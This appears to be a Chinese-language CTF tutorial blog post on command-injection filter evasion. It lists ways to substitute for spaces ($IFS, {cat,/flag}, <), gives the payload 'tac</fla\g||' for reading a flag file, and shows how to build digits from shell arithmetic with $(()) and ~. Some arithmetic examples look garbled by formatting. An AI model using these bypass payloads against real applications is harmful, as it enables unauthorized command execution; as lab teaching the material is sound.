@TOC

🍀预计时间：25 分钟学习目标：1 继续了解如何绕过过滤 2 学会构造数字

⚠别看今天目标少，内容需要思考滴！！！

过滤 cat，flag，空格，数字，$

承接上文，我们介绍了如何绕过过滤 cat，flag 等，可是如果同时过滤了空格和 $我们该怎么办呢？？？

明显，$IFS我们用不了了，所以这里再介绍几个绕过空格的方法：$

IFS

$IFS$1

${IFS}

{,}:例如{cat,/flag}

<

<>

对于题目种过滤空格，我们就可以利用这种方法来绕过，如果还同时过滤了里面的内容，可以尝试利用不同的方法绕过空格

这道题我们使用<来作答

传参 tac</fla\g||就可以得到 flag 了！！！

构造数字（这个比较难搞，所以重点介绍下）

==在 linux shell 中 $(())用来计算数学表达式==例如：echo$

(()) 0echo $(($(()))) -1echo $(($(())))$(($(())))$(($(()))) -1-1-1

echo $(($(($(($(())))$(($(())))$(($(()))))))) 2

echo $(($((~$(())))$((~$(())))$((~$(()))))) -3

有没有发现规律？？？很明显，如果括号内不加表达式就是 0，取反就是-1，我们可以把它们拼接在一起（-1-1-1），也可以加在一起（-3），在考试的时候我们可以利用这个方法来绕过对于数字的过滤

这个内容比较绕，需要自己慢慢琢磨琢磨

🏆🏆结束语：==命令执行漏洞的内容会不定期更新，如果对您有帮助的话可以订阅一下专栏==